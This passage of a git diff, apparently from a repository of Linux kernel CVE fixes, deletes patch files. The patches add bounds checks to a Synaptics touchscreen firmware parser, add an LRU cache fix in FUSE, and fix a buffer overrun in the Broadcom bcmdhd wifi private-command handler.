-@@ -771,6 +771,21 @@ static struct synaptics_rmi4_fwu_handle *fwu;
- DECLARE_COMPLETION(fwu_remove_complete);
- DEFINE_MUTEX(fwu_sysfs_mutex);
- 
-+/* Check offset + size <= bound.  true if in bounds, false otherwise. */
-+static bool in_bounds(unsigned long offset, unsigned long size,
-+		      unsigned long bound)
-+{
-+	if (offset > bound || size > bound) {
-+		pr_err("%s: %lu or %lu > %lu\n", __func__, offset, size, bound);
-+		return false;
-+	}
-+	if (offset > (bound - size)) {
-+		pr_err("%s: %lu > %lu - %lu\n", __func__, offset, size, bound);
-+		return false;
-+	}
-+	return true;
-+}
-+
- #ifdef HTC_FEATURE
- static uint32_t syn_crc(uint16_t *data, uint32_t len)
- {
-@@ -966,8 +981,10 @@ static void fwu_compare_partition_tables(void)
- 	return;
- }
- 
--static void fwu_parse_partition_table(const unsigned char *partition_table,
--		struct block_count *blkcount, struct physical_address *phyaddr)
-+static int fwu_parse_partition_table(const unsigned char *partition_table,
-+				     unsigned long len,
-+				     struct block_count *blkcount,
-+				     struct physical_address *phyaddr)
- {
- 	unsigned char ii;
- 	unsigned char index;
-@@ -979,6 +996,11 @@ static void fwu_parse_partition_table(const unsigned char *partition_table,
- 
- 	for (ii = 0; ii < fwu->partitions; ii++) {
- 		index = ii * 8 + 2;
-+		if (!in_bounds(index, sizeof(*ptable), len)) {
-+			pr_err("%s: %d/%d not in bounds\n", __func__, ii,
-+			       fwu->partitions);
-+			return -EINVAL;
-+		}
- 		ptable = (struct partition_table *)&partition_table[index];
- 		partition_length = ptable->partition_length_15_8 << 8 |
- 				ptable->partition_length_7_0;
-@@ -987,7 +1009,7 @@ static void fwu_parse_partition_table(const unsigned char *partition_table,
- 		dev_dbg(rmi4_data->pdev->dev.parent,
- 				"%s: Partition entry %d:\n",
- 				__func__, ii);
--		for (offset = 0; offset < 8; offset++) {
-+		for (offset = 0; offset < sizeof(*ptable); offset++) {
- 			dev_dbg(rmi4_data->pdev->dev.parent,
- 					"%s: 0x%02x\n",
- 					__func__,
-@@ -1077,16 +1099,17 @@ static void fwu_parse_partition_table(const unsigned char *partition_table,
- 		};
- 	}
- 
--	return;
-+	return 0;
- }
- 
--static void fwu_parse_image_header_10_utility(const unsigned char *image)
-+static int fwu_parse_image_header_10_utility(const unsigned char *image)
- {
- 	unsigned char ii;
- 	unsigned char num_of_containers;
- 	unsigned int addr;
- 	unsigned int container_id;
- 	unsigned int length;
-+	unsigned int content_offset;
- 	const unsigned char *content;
- 	struct container_descriptor *descriptor;
- 
-@@ -1099,15 +1122,22 @@ static void fwu_parse_image_header_10_utility(const unsigned char *image)
- 		if (ii >= MAX_UTILITY_PARAMS)
- 			continue;
- 		addr = le_to_uint(fwu->img.utility.data + (ii * 4));
-+		if (!in_bounds(addr, sizeof(*descriptor), fwu->image_size))
-+			return -EINVAL;
- 		descriptor = (struct container_descriptor *)(image + addr);
- 		container_id = descriptor->container_id[0] |
- 				descriptor->container_id[1] << 8;
--		content = image + le_to_uint(descriptor->content_address);
-+		content_offset = le_to_uint(descriptor->content_address);
- 		length = le_to_uint(descriptor->content_length);
-+		if (!in_bounds(content_offset, length, fwu->image_size))
-+			return -EINVAL;
-+		content = image + content_offset;
- 		switch (container_id) {
- 		case UTILITY_PARAMETER_CONTAINER:
- 			fwu->img.utility_param[ii].data = content;
- 			fwu->img.utility_param[ii].size = length;
-+			if (length < sizeof(content[0]))
-+				return -EINVAL;
- 			fwu->img.utility_param_id[ii] = content[0];
- 			break;
- 		default:
-@@ -1115,28 +1145,36 @@ static void fwu_parse_image_header_10_utility(const unsigned char *image)
- 		};
- 	}
- 
--	return;
-+	return 0;
- }
- 
--static void fwu_parse_image_header_10_bootloader(const unsigned char *image)
-+static int fwu_parse_image_header_10_bootloader(const unsigned char *image)
- {
- 	unsigned char ii;
- 	unsigned char num_of_containers;
- 	unsigned int addr;
- 	unsigned int container_id;
- 	unsigned int length;
-+	unsigned int content_offset;
- 	const unsigned char *content;
- 	struct container_descriptor *descriptor;
- 
-+	if (fwu->img.bootloader.size < 4)
-+		return -EINVAL;
- 	num_of_containers = (fwu->img.bootloader.size - 4) / 4;
- 
- 	for (ii = 1; ii <= num_of_containers; ii++) {
- 		addr = le_to_uint(fwu->img.bootloader.data + (ii * 4));
-+		if (!in_bounds(addr, sizeof(*descriptor), fwu->image_size))
-+			return -EINVAL;
- 		descriptor = (struct container_descriptor *)(image + addr);
- 		container_id = descriptor->container_id[0] |
- 				descriptor->container_id[1] << 8;
--		content = image + le_to_uint(descriptor->content_address);
-+		content_offset = le_to_uint(descriptor->content_address);
- 		length = le_to_uint(descriptor->content_length);
-+		if (!in_bounds(content_offset, length, fwu->image_size))
-+			return -EINVAL;
-+		content = image + content_offset;
- 		switch (container_id) {
- 		case BL_IMAGE_CONTAINER:
- 			fwu->img.bl_image.data = content;
-@@ -1157,29 +1195,36 @@ static void fwu_parse_image_header_10_bootloader(const unsigned char *image)
- 		};
- 	}
- 
--	return;
-+	return 0;
- }
- 
--static void fwu_parse_image_header_10(void)
-+static int fwu_parse_image_header_10(void)
- {
- 	unsigned char ii;
- 	unsigned char num_of_containers;
- 	unsigned int addr;
- 	unsigned int offset;
-+	unsigned int content_offset;
- 	unsigned int container_id;
- 	unsigned int length;
-+	unsigned int image_size;
- 	const unsigned char *image;
- 	const unsigned char *content;
- 	struct container_descriptor *descriptor;
- 	struct image_header_10 *header;
- 
- 	image = fwu->image;
-+	image_size = fwu->image_size;
-+	if (image_size < sizeof(*header))
-+		return -EINVAL;
- 	header = (struct image_header_10 *)image;
- 
- 	fwu->img.checksum = le_to_uint(header->checksum);
- 
- 	/* address of top level container */
- 	offset = le_to_uint(header->top_level_container_start_addr);
-+	if (!in_bounds(offset, sizeof(*descriptor), image_size))
-+		return -EINVAL;
- 	descriptor = (struct container_descriptor *)(image + offset);
- 
- 	/* address of top level container content */
-@@ -1187,13 +1232,20 @@ static void fwu_parse_image_header_10(void)
- 	num_of_containers = le_to_uint(descriptor->content_length) / 4;
- 
- 	for (ii = 0; ii < num_of_containers; ii++) {
-+		if (!in_bounds(offset, 4, image_size))
-+			return -EINVAL;
- 		addr = le_to_uint(image + offset);
- 		offset += 4;
-+		if (!in_bounds(addr, sizeof(*descriptor), image_size))
-+			return -EINVAL;
- 		descriptor = (struct container_descriptor *)(image + addr);
- 		container_id = descriptor->container_id[0] |
- 				descriptor->container_id[1] << 8;
--		content = image + le_to_uint(descriptor->content_address);
-+		content_offset = le_to_uint(descriptor->content_address);
- 		length = le_to_uint(descriptor->content_length);
-+		if (!in_bounds(content_offset, length, image_size))
-+			return -EINVAL;
-+		content = image + content_offset;
- 		switch (container_id) {
- 		case UI_CONTAINER:
- 		case CORE_CODE_CONTAINER:
-@@ -1209,12 +1261,14 @@ static void fwu_parse_image_header_10(void)
- 			fwu->img.bl_version = *content;
- 			fwu->img.bootloader.data = content;
- 			fwu->img.bootloader.size = length;
--			fwu_parse_image_header_10_bootloader(image);
-+			if (fwu_parse_image_header_10_bootloader(image))
-+				return -EINVAL;
- 			break;
- 		case UTILITY_CONTAINER:
- 			fwu->img.utility.data = content;
- 			fwu->img.utility.size = length;
--			fwu_parse_image_header_10_utility(image);
-+			if (fwu_parse_image_header_10_utility(image))
-+				return -EINVAL;
- 			break;
- 		case GUEST_CODE_CONTAINER:
- 			fwu->img.contains_guest_code = true;
-@@ -1239,6 +1293,8 @@ static void fwu_parse_image_header_10(void)
- 			break;
- 		case GENERAL_INFORMATION_CONTAINER:
- 			fwu->img.contains_firmware_id = true;
-+			if (length < 4 + 4)
-+				return -EINVAL;
- 			fwu->img.firmware_id = le_to_uint(content + 4);
- 			break;
- 		default:
-@@ -1246,10 +1302,10 @@ static void fwu_parse_image_header_10(void)
- 		}
- 	}
- 
--	return;
-+	return 0;
- }
- 
--static void fwu_parse_image_header_05_06(void)
-+static int fwu_parse_image_header_05_06(void)
- {
- 	int retval;
- 	const unsigned char *image;
-@@ -1257,6 +1313,8 @@ static void fwu_parse_image_header_05_06(void)
- 	struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
- 
- 	image = fwu->image;
-+	if (fwu->image_size < sizeof(*header))
-+		return -EINVAL;
- 	header = (struct image_header_05_06 *)image;
- 
- 	fwu->img.checksum = le_to_uint(header->checksum);
-@@ -1269,18 +1327,51 @@ static void fwu_parse_image_header_05_06(void)
- 
- 	fwu->img.ui_firmware.size = le_to_uint(header->firmware_size);
- 	if (fwu->img.ui_firmware.size) {
--		fwu->img.ui_firmware.data = image + IMAGE_AREA_OFFSET;
--		if (fwu->img.contains_bootloader)
--			fwu->img.ui_firmware.data += fwu->img.bootloader_size;
-+		unsigned int ui_firmware_offset = IMAGE_AREA_OFFSET;
-+
-+		if (fwu->img.contains_bootloader) {
-+			if (!in_bounds(ui_firmware_offset,
-+				       fwu->img.bootloader_size,
-+				       fwu->image_size)) {
-+				return -EINVAL;
-+			}
-+			ui_firmware_offset += fwu->img.bootloader_size;
-+		}
-+		if (!in_bounds(ui_firmware_offset,
-+			       fwu->img.ui_firmware.size,
-+			       fwu->image_size)) {
-+			return -EINVAL;
-+		}
-+		fwu->img.ui_firmware.data = image + ui_firmware_offset;
- 	}
- 
--	if ((fwu->img.bl_version == BL_V6) && header->options_tddi)
-+	if ((fwu->img.bl_version == BL_V6) && header->options_tddi) {
-+		if (!in_bounds(IMAGE_AREA_OFFSET,
-+			       fwu->img.ui_firmware.size,
-+			       fwu->image_size)) {
-+			return -EINVAL;
-+		}
- 		fwu->img.ui_firmware.data = image + IMAGE_AREA_OFFSET;
-+	}
- 
- 	fwu->img.ui_config.size = le_to_uint(header->config_size);
- 	if (fwu->img.ui_config.size) {
--		fwu->img.ui_config.data = fwu->img.ui_firmware.data +
-+		unsigned int ui_firmware_end;
-+
-+		if (fwu->img.ui_firmware.data < image)
-+			return -EINVAL;
-+		if (!in_bounds(fwu->img.ui_firmware.data - image,
-+			       fwu->img.ui_firmware.size,
-+			       fwu->image_size)) {
-+			return -EINVAL;
-+		}
-+		ui_firmware_end = fwu->img.ui_firmware.data - image +
- 				fwu->img.ui_firmware.size;
-+		if (!in_bounds(ui_firmware_end, fwu->img.ui_config.size,
-+			       fwu->image_size)) {
-+			return -EINVAL;
-+		}
-+		fwu->img.ui_config.data = image + ui_firmware_end;
- 	}
- 
- 	if ((fwu->img.bl_version == BL_V5 && fwu->img.contains_bootloader) ||
-@@ -1292,6 +1383,11 @@ static void fwu_parse_image_header_05_06(void)
- 	if (fwu->img.contains_disp_config) {
- 		fwu->img.disp_config_offset = le_to_uint(header->dsp_cfg_addr);
- 		fwu->img.dp_config.size = le_to_uint(header->dsp_cfg_size);
-+		if (!in_bounds(fwu->img.disp_config_offset,
-+			       fwu->img.dp_config.size,
-+			       fwu->image_size)) {
-+			return -EINVAL;
-+		}
- 		fwu->img.dp_config.data = image + fwu->img.disp_config_offset;
- 	} else {
- 		retval = secure_memcpy(fwu->img.cstmr_product_id,
-@@ -1323,28 +1419,41 @@ static void fwu_parse_image_header_05_06(void)
- 	}
- 	fwu->img.product_id[PRODUCT_ID_SIZE] = 0;
- 
-+	if (LOCKDOWN_SIZE > IMAGE_AREA_OFFSET)
-+		return -EINVAL;
-+	if (fwu->image_size < IMAGE_AREA_OFFSET)
-+		return -EINVAL;
- 	fwu->img.lockdown.size = LOCKDOWN_SIZE;
- 	fwu->img.lockdown.data = image + IMAGE_AREA_OFFSET - LOCKDOWN_SIZE;
- 
--	return;
-+	return 0;
- }
- 
- static int fwu_parse_image_info(void)
- {
-+	int parse_retval;
- 	struct image_header_10 *header;
- 	struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
-+	unsigned int image_size = 0;
- 
- 	header = (struct image_header_10 *)fwu->image;
--
-+	if (!header)
-+		return -EINVAL;
-+	image_size = fwu->image_size;
-+	if (image_size < sizeof(struct image_header_05_06) &&
-+	    image_size < sizeof(struct image_header_10)) {
-+		return -EINVAL;
-+	}
-+	/* This is clearing img, not image. */
- 	memset(&fwu->img, 0x00, sizeof(fwu->img));
- 
- 	switch (header->major_header_version) {
- 	case IMAGE_HEADER_VERSION_10:
--		fwu_parse_image_header_10();
-+		parse_retval = fwu_parse_image_header_10();
- 		break;
- 	case IMAGE_HEADER_VERSION_05:
- 	case IMAGE_HEADER_VERSION_06:
--		fwu_parse_image_header_05_06();
-+		parse_retval = fwu_parse_image_header_05_06();
- 		break;
- 	default:
- 		dev_err(rmi4_data->pdev->dev.parent,
-@@ -1353,6 +1462,10 @@ static int fwu_parse_image_info(void)
- 		return -EINVAL;
- 	}
- 
-+	if (parse_retval != 0) {
-+		return -EINVAL;
-+	}
-+
- 	if (fwu->bl_version == BL_V7 || fwu->bl_version == BL_V8) {
- 		if (!fwu->img.contains_flash_config) {
- 			dev_err(rmi4_data->pdev->dev.parent,
-@@ -1361,9 +1474,12 @@ static int fwu_parse_image_info(void)
- 			return -EINVAL;
- 		}
- 
--		fwu_parse_partition_table(fwu->img.fl_config.data,
--				&fwu->img.blkcount, &fwu->img.phyaddr);
--
-+		if (fwu_parse_partition_table(fwu->img.fl_config.data,
-+					      fwu->img.fl_config.size,
-+					      &fwu->img.blkcount,
-+					      &fwu->img.phyaddr)) {
-+			return -EINVAL;
-+		}
- 		fwu_compare_partition_tables();
- 	} else {
- 		fwu->new_partition_table = false;
-@@ -1980,7 +2096,11 @@ static int fwu_read_f34_v7_queries(void)
- 		return retval;
- 	}
- 
--	fwu_parse_partition_table(ptable, &fwu->blkcount, &fwu->phyaddr);
-+	if (fwu_parse_partition_table(ptable, fwu->partition_table_bytes,
-+				      &fwu->blkcount, &fwu->phyaddr)) {
-+		kfree(ptable);
-+		return -EINVAL;
-+	}
- 
- 	if (fwu->blkcount.dp_config)
- 		fwu->flash_properties.has_disp_config = 1;
-@@ -3209,6 +3329,9 @@ static int fwu_write_utility_parameter(void)
- 	struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
- 
- 	utility_param_size = fwu->blkcount.utility_param * fwu->block_size;
-+	/* See remaining_size below for reason for '4' */
-+	if (utility_param_size < 4)
-+		return -EINVAL;
- 	retval = fwu_allocate_read_config_buf(utility_param_size);
- 	if (retval < 0)
- 		return retval;
-@@ -4910,6 +5033,7 @@ int synaptics_config_updater(struct synaptics_dsx_board_data *bdata)
- 
- 	rmi4_data->stay_awake = true;
- 
-+	memset(config_id, 0, sizeof(config_id));
- 	if (fwu->bl_version == BL_V7)
- 		config_id_size = V7_CONFIG_ID_SIZE;
- 	else
-@@ -4928,6 +5052,7 @@ int synaptics_config_updater(struct synaptics_dsx_board_data *bdata)
- 	}
- 
- 	memset(str_buf, 0, sizeof(str_buf));
-+	memset(tmp_buf, 0, sizeof(tmp_buf));
- 	for (ii = 0; ii < config_id_size; ii++) {
- 		snprintf(tmp_buf, 3, "%02x ", config_id[ii]);
- 		strlcat(str_buf, tmp_buf, sizeof(str_buf));
diff --git a/Patches/Linux_CVEs/CVE-2016-8463/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8463/ANY/0001.patch
deleted file mode 100644
index 0df93c6b..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8463/ANY/0001.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From cd0fa86de6ca1d40c0a93d86d1c0f7846e8a9a10 Mon Sep 17 00:00:00 2001
-From: Laura Abbott <lauraa@codeaurora.org>
-Date: Fri, 3 Jan 2014 10:47:00 -0800
-Subject: fs: fuse: Add replacment for CMA pages into the LRU cache
-
-CMA pages are currently replaced in the FUSE file system since
-FUSE may hold on to CMA pages for a long time, preventing migration.
-The replacement page is added to the file cache but not the LRU
-cache. This may prevent the page from being properly aged and dropped,
-creating poor performance under tight memory condition. Fix this by
-adding the new page to the LRU cache after creation.
-
-Change-Id: Ib349abf1024d48386b835335f3fbacae040b6241
-CRs-Fixed: 586855
-Signed-off-by: Laura Abbott <lauraa@codeaurora.org>
----
- fs/fuse/file.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/fs/fuse/file.c b/fs/fuse/file.c
-index e231a7f..3411ed8 100644
---- a/fs/fuse/file.c
-+++ b/fs/fuse/file.c
-@@ -822,6 +822,8 @@ static int fuse_readpages_fill(void *_data, struct page *page)
- 		lock_page(newpage);
- 		put_page(newpage);
- 
-+		lru_cache_add_file(newpage);
-+
- 		/* finally release the old page and swap pointers */
- 		unlock_page(oldpage);
- 		page_cache_release(oldpage);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8464/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-8464/3.10/0001.patch
deleted file mode 100644
index 41a86e5a..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8464/3.10/0001.patch
+++ /dev/null
@@ -1,146 +0,0 @@
-From cbf66a616bb08cc6c932e4122f3271df83e253bb Mon Sep 17 00:00:00 2001
-From: Insun Song <insun.song@broadcom.com>
-Date: Tue, 25 Oct 2016 13:33:18 -0700
-Subject: [PATCH] net: wireless: bcmdhd: fix buffer overrun in private command
- path
-
-buffer overrun case found when length parameter manipulated.
-
-1. if input parameter buffer length is less than 4k,
-then allocate 4k by default. It help to get enough margin
-for output string overwritten.
-
-2. added additional length check not to override user space
-allocated buffer size.
-
-bug=29000183
-Change-Id: I0c15d764c1648920f0214ec47ada689ca44ebfba
-Signed-off-by: Insun Song <insun.song@broadcom.com>
----
- drivers/net/wireless/bcmdhd/wl_android.c | 58 ++++++++++++++++++++------------
- 1 file changed, 37 insertions(+), 21 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/wl_android.c b/drivers/net/wireless/bcmdhd/wl_android.c
-index c8cae82af2f46..86c56e28f532c 100644
---- a/drivers/net/wireless/bcmdhd/wl_android.c
-+++ b/drivers/net/wireless/bcmdhd/wl_android.c
-@@ -246,17 +246,22 @@ static int wl_android_get_rssi(struct net_device *net, char *command, int total_
- 		return -1;
- 	if ((ssid.SSID_len == 0) || (ssid.SSID_len > DOT11_MAX_SSID_LEN)) {
- 		DHD_ERROR(("%s: wldev_get_ssid failed\n", __FUNCTION__));
--	} else if (total_len <= ssid.SSID_len) {
--		return -ENOMEM;
- 	} else {
--		memcpy(command, ssid.SSID, ssid.SSID_len);
--		bytes_written = ssid.SSID_len;
-+		if (total_len > ssid.SSID_len) {
-+			memcpy(command, ssid.SSID, ssid.SSID_len);
-+			bytes_written = ssid.SSID_len;
-+		} else {
-+			return BCME_ERROR;
-+		}
-+	}
-+
-+	if ((total_len - bytes_written) >= (strlen(" rssi -XXX") + 1)) {
-+		bytes_written += snprintf(&command[bytes_written], total_len - bytes_written,
-+		" rssi %d", rssi);
-+		command[bytes_written] = '\0';
-+	} else {
-+		return BCME_ERROR;
- 	}
--	if ((total_len - bytes_written) < (strlen(" rssi -XXX") + 1))
--		return -ENOMEM;
--	bytes_written += scnprintf(&command[bytes_written],
--		total_len - bytes_written, " rssi %d", rssi);
--	command[bytes_written] = '\0';
- 
- 	DHD_INFO(("%s: command result is %s (%d)\n", __FUNCTION__, command, bytes_written));
- 	return bytes_written;
-@@ -1332,13 +1337,17 @@ int wl_android_priv_cmd(struct net_device *net, struct ifreq *ifr, int cmd)
- 	}
- 
- 	if ((priv_cmd.total_len > PRIVATE_COMMAND_MAX_LEN) || (priv_cmd.total_len < 0)) {
--		DHD_ERROR(("%s: buf length invalid:%d\n", __FUNCTION__,
--			   priv_cmd.total_len));
-+		DHD_ERROR(("%s: buf length invalid:%d \n", __FUNCTION__, priv_cmd.total_len));
- 		ret = -EINVAL;
- 		goto exit;
- 	}
- 
--	buf_size = max(priv_cmd.total_len, PRIVATE_COMMAND_DEF_LEN);
-+	if (priv_cmd.total_len < PRIVATE_COMMAND_DEF_LEN) {
-+		buf_size = PRIVATE_COMMAND_DEF_LEN;
-+	} else {
-+		buf_size = priv_cmd.total_len;
-+	}
-+
- 	command = kmalloc((buf_size + 1), GFP_KERNEL);
- 
- 	if (!command)
-@@ -1355,20 +1364,22 @@ int wl_android_priv_cmd(struct net_device *net, struct ifreq *ifr, int cmd)
- 
- 	DHD_INFO(("%s: Android private cmd \"%s\" on %s\n", __FUNCTION__, command, ifr->ifr_name));
- 
--	bytes_written = wl_handle_private_cmd(net, command, priv_cmd.total_len);
-+	bytes_written = wl_handle_private_cmd(net, command, buf_size);
- 	if (bytes_written >= 0) {
--		if ((bytes_written == 0) && (priv_cmd.total_len > 0))
-+		if ((bytes_written == 0) && (priv_cmd.total_len > 0)) {
- 			command[0] = '\0';
-+		}
- 		if (bytes_written >= priv_cmd.total_len) {
--			DHD_ERROR(("%s: err. b_w:%d >= tot:%d\n", __FUNCTION__,
--				   bytes_written, priv_cmd.total_len));
-+			DHD_ERROR(("%s: not enough for output. bytes_written:%d >= total_len:%d \n",
-+				__FUNCTION__, bytes_written, priv_cmd.total_len));
- 			ret = BCME_BUFTOOSHORT;
- 			goto exit;
-+		} else {
-+			bytes_written++;
- 		}
--		bytes_written++;
- 		priv_cmd.used_len = bytes_written;
- 		if (copy_to_user(priv_cmd.buf, command, bytes_written)) {
--			DHD_ERROR(("%s: failed copy to user\n", __FUNCTION__));
-+			DHD_ERROR(("%s: failed to copy data to user buffer\n", __FUNCTION__));
- 			ret = -EFAULT;
- 		}
- 	} else {
-@@ -1377,13 +1388,17 @@ int wl_android_priv_cmd(struct net_device *net, struct ifreq *ifr, int cmd)
- 
- exit:
- 	net_os_wake_unlock(net);
--	kfree(command);
-+	if (command) {
-+		kfree(command);
-+	}
-+
- 	return ret;
- }
- 
- int
- wl_handle_private_cmd(struct net_device *net, char *command, u32 buf_size)
- {
-+
- 	int bytes_written = 0;
- 	android_wifi_priv_cmd priv_cmd;
- 
-@@ -1400,7 +1415,7 @@ wl_handle_private_cmd(struct net_device *net, char *command, u32 buf_size)
- 
- 	if (!g_wifi_on) {
- 		DHD_ERROR(("%s: Ignore private cmd \"%s\" - iface is down\n",
--			   __FUNCTION__, command));
-+			__FUNCTION__, command));
- 		return 0;
- 	}
- 
-@@ -1558,7 +1573,8 @@ wl_handle_private_cmd(struct net_device *net, char *command, u32 buf_size)
- 	}
- 	else {
- 		DHD_ERROR(("Unknown PRIVATE command %s - ignored\n", command));
--		bytes_written = scnprintf(command, sizeof("FAIL"), "FAIL");
-+		snprintf(command, 5, "FAIL");
-+		bytes_written = strlen("FAIL");
- 	}
- 
- 	return bytes_written;
diff --git a/Patches/Linux_CVEs/CVE-2016-8464/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-8464/3.18/0002.patch
deleted file mode 100644
index 7cafb519..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8464/3.18/0002.patch
+++ /dev/null
@@ -1,165 +0,0 @@
-diff --git a/drivers/net/wireless/bcmdhd/wl_android.c b/drivers/net/wireless/bcmdhd/wl_android.c
-index 24b71c5..0db69ef 100644
---- a/drivers/net/wireless/bcmdhd/wl_android.c
-+++ b/drivers/net/wireless/bcmdhd/wl_android.c
-@@ -246,11 +246,18 @@
- 		return -1;
- 	if ((ssid.SSID_len == 0) || (ssid.SSID_len > DOT11_MAX_SSID_LEN)) {
- 		DHD_ERROR(("%s: wldev_get_ssid failed\n", __FUNCTION__));
-+	} else if (total_len <= ssid.SSID_len) {
-+		return -ENOMEM;
- 	} else {
- 		memcpy(command, ssid.SSID, ssid.SSID_len);
- 		bytes_written = ssid.SSID_len;
- 	}
--	bytes_written += snprintf(&command[bytes_written], total_len, " rssi %d", rssi);
-+	if ((total_len - bytes_written) < (strlen(" rssi -XXX") + 1))
-+		return -ENOMEM;
-+	bytes_written += scnprintf(&command[bytes_written],
-+		total_len - bytes_written, " rssi %d", rssi);
-+	command[bytes_written] = '\0';
-+
- 	DHD_INFO(("%s: command result is %s (%d)\n", __FUNCTION__, command, bytes_written));
- 	return bytes_written;
- }
-@@ -1284,10 +1291,13 @@
- int wl_android_priv_cmd(struct net_device *net, struct ifreq *ifr, int cmd)
- {
- #define PRIVATE_COMMAND_MAX_LEN	8192
-+#define PRIVATE_COMMAND_DEF_LEN	4096
-+
- 	int ret = 0;
- 	char *command = NULL;
- 	int bytes_written = 0;
- 	android_wifi_priv_cmd priv_cmd;
-+	int buf_size = 0;
- 
- 	net_os_wake_lock(net);
- 
-@@ -1321,12 +1331,17 @@
- 			goto exit;
- 		}
- 	}
-+
- 	if ((priv_cmd.total_len > PRIVATE_COMMAND_MAX_LEN) || (priv_cmd.total_len < 0)) {
--		DHD_ERROR(("%s: too long priavte command\n", __FUNCTION__));
-+		DHD_ERROR(("%s: buf length invalid:%d\n", __FUNCTION__,
-+			   priv_cmd.total_len));
- 		ret = -EINVAL;
- 		goto exit;
- 	}
--	command = kmalloc((priv_cmd.total_len + 1), GFP_KERNEL);
-+
-+	buf_size = max(priv_cmd.total_len, PRIVATE_COMMAND_DEF_LEN);
-+	command = kmalloc((buf_size + 1), GFP_KERNEL);
-+
- 	if (!command)
- 	{
- 		DHD_ERROR(("%s: failed to allocate memory\n", __FUNCTION__));
-@@ -1341,6 +1356,41 @@
- 
- 	DHD_INFO(("%s: Android private cmd \"%s\" on %s\n", __FUNCTION__, command, ifr->ifr_name));
- 
-+	bytes_written = wl_handle_private_cmd(net, command, priv_cmd.total_len);
-+	if (bytes_written >= 0) {
-+		if ((bytes_written == 0) && (priv_cmd.total_len > 0))
-+			command[0] = '\0';
-+		if (bytes_written >= priv_cmd.total_len) {
-+			DHD_ERROR(("%s: err. b_w:%d >= tot:%d\n", __FUNCTION__,
-+				   bytes_written, priv_cmd.total_len));
-+			ret = BCME_BUFTOOSHORT;
-+			goto exit;
-+		}
-+		bytes_written++;
-+		priv_cmd.used_len = bytes_written;
-+		if (copy_to_user(priv_cmd.buf, command, bytes_written)) {
-+			DHD_ERROR(("%s: failed copy to user\n", __FUNCTION__));
-+			ret = -EFAULT;
-+		}
-+	} else {
-+		ret = bytes_written;
-+	}
-+
-+exit:
-+	net_os_wake_unlock(net);
-+	kfree(command);
-+	return ret;
-+}
-+
-+int
-+wl_handle_private_cmd(struct net_device *net, char *command, u32 buf_size)
-+{
-+	int bytes_written = 0;
-+	android_wifi_priv_cmd priv_cmd;
-+
-+	bzero(&priv_cmd, sizeof(android_wifi_priv_cmd));
-+	priv_cmd.total_len = buf_size;
-+
- 	if (strnicmp(command, CMD_START, strlen(CMD_START)) == 0) {
- 		DHD_INFO(("%s, Received regular START command\n", __FUNCTION__));
- 		bytes_written = wl_android_wifi_on(net);
-@@ -1350,10 +1400,9 @@
- 	}
- 
- 	if (!g_wifi_on) {
--		DHD_ERROR(("%s: Ignore private cmd \"%s\" - iface %s is down\n",
--			__FUNCTION__, command, ifr->ifr_name));
--		ret = 0;
--		goto exit;
-+		DHD_ERROR(("%s: Ignore private cmd \"%s\" - iface is down\n",
-+			   __FUNCTION__, command));
-+		return 0;
- 	}
- 
- 	if (strnicmp(command, CMD_STOP, strlen(CMD_STOP)) == 0) {
-@@ -1511,36 +1560,10 @@
- 	}
- 	else {
- 		DHD_ERROR(("Unknown PRIVATE command %s - ignored\n", command));
--		snprintf(command, 3, "OK");
--		bytes_written = strlen("OK");
-+		bytes_written = scnprintf(command, sizeof("FAIL"), "FAIL");
- 	}
- 
--	if (bytes_written >= 0) {
--		if ((bytes_written == 0) && (priv_cmd.total_len > 0))
--			command[0] = '\0';
--		if (bytes_written >= priv_cmd.total_len) {
--			DHD_ERROR(("%s: bytes_written = %d\n", __FUNCTION__, bytes_written));
--			bytes_written = priv_cmd.total_len;
--		} else {
--			bytes_written++;
--		}
--		priv_cmd.used_len = bytes_written;
--		if (copy_to_user(priv_cmd.buf, command, bytes_written)) {
--			DHD_ERROR(("%s: failed to copy data to user buffer\n", __FUNCTION__));
--			ret = -EFAULT;
--		}
--	}
--	else {
--		ret = bytes_written;
--	}
--
--exit:
--	net_os_wake_unlock(net);
--	if (command) {
--		kfree(command);
--	}
--
--	return ret;
-+	return bytes_written;
- }
- 
- int wl_android_init(void)
-diff --git a/drivers/net/wireless/bcmdhd/wl_android.h b/drivers/net/wireless/bcmdhd/wl_android.h
-index 2827132..f62b646 100644
---- a/drivers/net/wireless/bcmdhd/wl_android.h
-+++ b/drivers/net/wireless/bcmdhd/wl_android.h
-@@ -53,6 +53,7 @@
- int wl_android_wifi_on(struct net_device *dev);
- int wl_android_wifi_off(struct net_device *dev, bool on_failure);
- int wl_android_priv_cmd(struct net_device *net, struct ifreq *ifr, int cmd);
-+int wl_handle_private_cmd(struct net_device *net, char *command, u32 cmd_len);
- 
- 
- /* hostap mac mode */
diff --git a/Patches/Linux_CVEs/CVE-2016-8464/3.18/0002.patch.base64 b/Patches/Linux_CVEs/CVE-2016-8464/3.18/0002.patch.base64
deleted file mode 100644
index 8a38957a..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8464/3.18/0002.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
